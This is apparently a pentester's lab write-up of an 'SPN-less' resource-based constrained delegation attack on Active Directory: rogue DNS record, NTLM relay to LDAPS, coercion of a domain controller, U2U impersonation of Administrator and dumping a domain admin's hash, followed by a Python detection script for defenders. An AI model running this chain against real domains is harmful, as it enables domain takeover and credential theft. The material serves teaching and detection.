Today’s prelude to a tale of pentest pwnage talks about something called “SPN-less RBCD” (resource-based constrained delegation). Here are the key steps:

Let’s use my lab as an example and say that TT-DC02 is where WebDAV is enabled.

Add a DNS record that points to your testing box (I think this is required so the victim systems consider you to be in the “Trusted Zone”): -u 'tangent\7MinSec' -p 'MySuperSecurePassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

Set up the relay to TT-DC02: -smb2support -t ldaps:// --delegate-access --escalate-user 7minsec

Coerce TT-DC01 to auth to your Kali box:

coercer coerce -u 7MinSec -p 'MySuperSecurePassword' -t TT-DC01 -l ROGUE-DNS-RECORD --auth-type http

If it worked, your ntlmrelayx window should say something like: 7minsec can now impersonate users on TT-DC01$ via S4U2Proxy

Then I followed to perform SPN-less RBCD: -hashes :$(pypykatz crypto nt 'MySuperSecurePassword')

Take note of the session key from this command: 7minsec.ccache | grep 'Ticket Session Key'

Change the account password: -newhashes :TICKET-SESSION-KEY-GOES-HERE

Perform U2U:

KRB5CCNAME=7minsec.ccache -u2u -impersonate Administrator -spn host/tt-dc01 -k -no-pass

Profit! In this example, stealing a domain admin (Tommy’s) hash:

KRB5CCNAME='tt-dc01$@host_tt-dc01@TANGENT.TOWN.ccache' -k -no-pass @tt-dc01 -just-dc-user tommy
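As an added example for defenders (not part of the original post), here is detection logic that correlates the two directory-audit events this chain leaves behind: a 5136 write to msDS-AllowedToActOnBehalfOfOtherIdentity on a computer object (written by the relayed machine account on its own object) followed shortly by a 4724 password reset of the delegate user. The event records, their simplified field names and the 30-minute window are constructed assumptions, not real Windows exports.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed sample audit events in a simplified dict shape (not real Windows exports).
# 5136 = directory service object modified, 4724 = account password reset attempt.
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-05-01T10:01:30", "subject": "TT-DC01$",
     "object": "CN=TT-DC01,OU=Domain Controllers,DC=tangent,DC=town",
     "attribute": RBCD_ATTR, "op": "Value Added"},
    {"id": 4724, "time": "2024-05-01T10:02:10", "subject": "7minsec", "target": "7minsec"},
    {"id": 5136, "time": "2024-05-01T12:00:00", "subject": "helpdesk",
     "object": "CN=WEB01,OU=Servers,DC=tangent,DC=town",
     "attribute": "description", "op": "Value Added"},
]

def _ts(event):
    return datetime.fromisoformat(event["time"])

def _cn(dn):
    # First RDN of the distinguished name, e.g. "CN=TT-DC01,..." -> "TT-DC01"
    return dn.split(",")[0].split("=", 1)[1]

def find_rbcd_changes(events):
    """5136 events that write the RBCD attribute on any directory object."""
    return [e for e in events if e["id"] == 5136 and e.get("attribute") == RBCD_ATTR]

def password_resets_after(events, start, window=timedelta(minutes=30)):
    """4724 events within `window` after `start`; in the SPN-less variant the delegate
    user's password is reset to a ticket session key right after RBCD is granted."""
    return [e for e in events if e["id"] == 4724 and start <= _ts(e) <= start + window]

def analyze(events):
    findings = []
    for ev in find_rbcd_changes(events):
        on_dc = "OU=Domain Controllers" in ev["object"]
        # A machine account writing RBCD on its own object is the relay signature:
        # the coerced computer's authentication was replayed against LDAP.
        self_modified = ev["subject"].rstrip("$").upper() == _cn(ev["object"]).upper()
        resets = password_resets_after(events, _ts(ev))
        severity = "critical" if resets else ("high" if on_dc or self_modified else "medium")
        findings.append({"object": ev["object"], "by": ev["subject"], "on_dc": on_dc,
                         "self_modified": self_modified, "severity": severity,
                         "password_resets_after": [r["target"] for r in resets]})
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```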

Written by: Brian Johnson
